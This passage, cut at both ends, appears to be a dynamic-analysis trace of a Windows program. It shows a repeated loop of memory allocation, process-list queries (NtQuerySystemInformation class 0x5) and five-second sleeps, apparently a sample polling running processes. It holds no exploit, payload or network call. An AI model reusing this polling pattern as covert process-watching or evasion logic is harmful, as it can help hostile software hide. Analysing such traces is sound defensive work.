RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.314] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.333] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.345] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.361] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.376] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.394] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.409] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.424] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.441] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.454] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.470] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.487] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.502] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.517] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.532] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.547] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.569] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.583] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.594] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.618] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.627] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.642] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: 